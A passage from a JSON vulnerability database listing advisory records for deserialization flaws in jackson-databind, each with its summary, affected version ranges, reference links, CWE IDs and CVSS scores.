"severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qmqc-x3r4-6v39", "published": "2020-05-15T18:59:07Z", "modified": "2024-12-02T05:41:11.671530Z", "aliases": [ "CVE-2019-14893" ], "summary": "Polymorphic deserialization of malicious object in jackson-databind", "details": "A flaw was discovered in FasterXML jackson-databind in all versions before 2.9.10 and 2.10.0, where it would permit polymorphic deserialization of malicious objects using the xalan JNDI gadget when used in conjunction with polymorphic type handling methods such as `enableDefaultTyping()` or when @JsonTypeInfo is using `Id.CLASS` or `Id.MINIMAL_CLASS` or in any other way which ObjectMapper.readValue might instantiate objects from unsafe sources. 
An attacker could use this flaw to execute arbitrary code.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-qmqc-x3r4-6v39/GHSA-qmqc-x3r4-6v39.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-14893" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2469" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/998efd708284778f29d83d7962a9bd935c228317" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0729" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14893" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200327-0006" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-04-22T20:58:45Z", "nvd_published_at": "2020-03-02T21:15:00Z", "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-qr7j-h6gg-jmgc", 
"published": "2019-07-16T17:42:21Z", "modified": "2024-03-11T05:21:14.313980Z", "aliases": [ "CVE-2018-11307" ], "summary": "Deserialization of Untrusted Data in jackson-databind", "details": "An issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.5. Use of Jackson default typing along with a gadget class from iBatis allows exfiltration of content. Fixed in 2.7.9.4, 2.8.11.2, and 2.9.6.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.7.9.4" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.9.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-qr7j-h6gg-jmgc/GHSA-qr7j-h6gg-jmgc.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.2" } ] 
} ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-qr7j-h6gg-jmgc/GHSA-qr7j-h6gg-jmgc.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.6" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-qr7j-h6gg-jmgc/GHSA-qr7j-h6gg-jmgc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11307" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7525" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2032" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/051bd5e447fbc9539e12a4fe90eb989dba0c656" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb73" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/78e78738d69adcb59fdac9fc12d9053ce8809f3d" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": 
"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/7fcf88aff0d1deaa5c3c7be8d58c05ad7ad5da94b59065d8e7c50c5d@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4037" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3140" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3002" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1823" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1822" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0782" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2019-07-16T00:41:07Z", "nvd_published_at": "2019-07-09T16:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qxxx-2pp7-5hmx", "published": "2018-10-16T17:21:35Z", "modified": "2024-03-11T05:19:49.080060Z", 
"aliases": [ "CVE-2017-7525" ], "summary": "jackson-databind is vulnerable to a deserialization flaw", "details": "A deserialization flaw was discovered in the jackson-databind, versions before 2.6.7.1, 2.7.9.1 and 2.8.9, which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.6.7.1" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.6.7.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-qxxx-2pp7-5hmx/GHSA-qxxx-2pp7-5hmx.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.1" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.9.0", "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-qxxx-2pp7-5hmx/GHSA-qxxx-2pp7-5hmx.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.9" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-qxxx-2pp7-5hmx/GHSA-qxxx-2pp7-5hmx.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7525" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/1723" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/1599" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/fd8dec2c7fab8b4b4bd60502a0f1d63ec23c24da" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/fa87c1ddbe803ebb7295f5c2ebfe38e12f6e6162" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/3bfbb835e530055c1941ddf87fde0b08d08dcd38" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/680d75b011edd67a2d2a2e9980998a968194c2ef" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/6ce32ffd18facac6abdbbf559c817b47fcb622c1" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/90042692085deeb05ae75c569c9909f7dba24415" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-qxxx-2pp7-5hmx" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/3c87dc8bca99a2b3b4743713b33d1de05b1d6b761fdf316224e9c81f@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/4641ed8616ccc2c1fbddac2c3dc9900c96387bc226eaf0232d61909b@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5008bcbd45ee65ce39e4220b6ac53d28a24d6bc67d5804e9773a7399@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b1f33fe5ade396bb903fdcabe9f243f7692c7dfce5418d3743c2d346@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2017/dsa-4004" }, { "type": "WEB", "url": "https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US\u0026docId=emr_na-hpesbhf03902en_us" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20171214-0002" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00039.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00037.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf7f87810c38dc9abf9f93989f76008f504cbf7c1a355214640b2d04c@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r68acf97f4526ba59a33cc6e592261ea4f85d890f99e79c82d57dd589@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r42ac3e39e6265db12d9fc6ae1cd4b5fea7aed9830dc6f6d58228fed7@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f60afd3c7e9ebaaf70fad4a4beb75cf8740ac959017a31e7006c7486@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f095a791bda6c0595f691eddd0febb2d396987eec5cbd29120d8c629@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c9d5ff20929e8a3c8794facf4c4b326a9c10618812eec356caa20b87@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c2ed4c0126b43e324cf740012a0edd371fd36096fd777be7bfe7a2a6@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c10a2bf0fdc3d25faf17bd191d6ec46b29a353fa9c97bebd7c4e5913@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:1834" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:1835" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:1836" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:1837" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:1839" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:1840" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2477" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2546" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2547" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2633" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2635" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2636" }, { "type": "WEB", 
"url": "https://access.redhat.com/errata/RHSA-2017:2637" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2638" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3141" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3454" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3455" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3456" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3458" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0294" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0342" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1449" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1450" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0910" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1462702" }, { "type": "WEB", "url": "https://cwiki.apache.org/confluence/display/WW/S2-055" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html" } ], "database_specific": { "cwe_ids": [ "CWE-184", "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:53:14Z", "nvd_published_at": "2018-02-06T15:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r3gr-cxrf-hg25", "published": 
"2021-12-09T19:15:11Z", "modified": "2024-06-25T14:20:21.323050Z", "aliases": [ "CVE-2020-35491" ], "summary": "Serialization gadgets exploit in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.SharedPoolDataSource.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], 
"database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.7", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-r3gr-cxrf-hg25/GHSA-r3gr-cxrf-hg25.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35491" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2986" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/41b8bdb5ccc1d8edb71acf1c8234da235a24249d" }, { "type": "WEB", "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210122-0005" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502", "CWE-913" ], "github_reviewed": true, "github_reviewed_at": "2021-04-08T21:05:38Z", "nvd_published_at": "2020-12-17T19:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r695-7vr9-jgc2", "published": "2021-12-09T19:16:51Z", "modified": "2024-02-18T05:30:45.856594Z", "aliases": [ "CVE-2020-36187" ], "summary": "Unsafe Deserialization in jackson-databind", "details": "FasterXML 
jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-r695-7vr9-jgc2/GHSA-r695-7vr9-jgc2.json" } } ], 
"references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36187" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2997" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1" }, { "type": "WEB", "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210205-0005" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-03-18T23:23:27Z", "nvd_published_at": "2021-01-06T23:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rf6r-2c4q-2vwg", "published": "2020-05-15T18:58:54Z", "modified": "2024-03-15T01:05:13.129194Z", "aliases": [ "CVE-2020-10968" ], "summary": "jackson-databind mishandles the interaction between serialization gadgets and typing", "details": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between 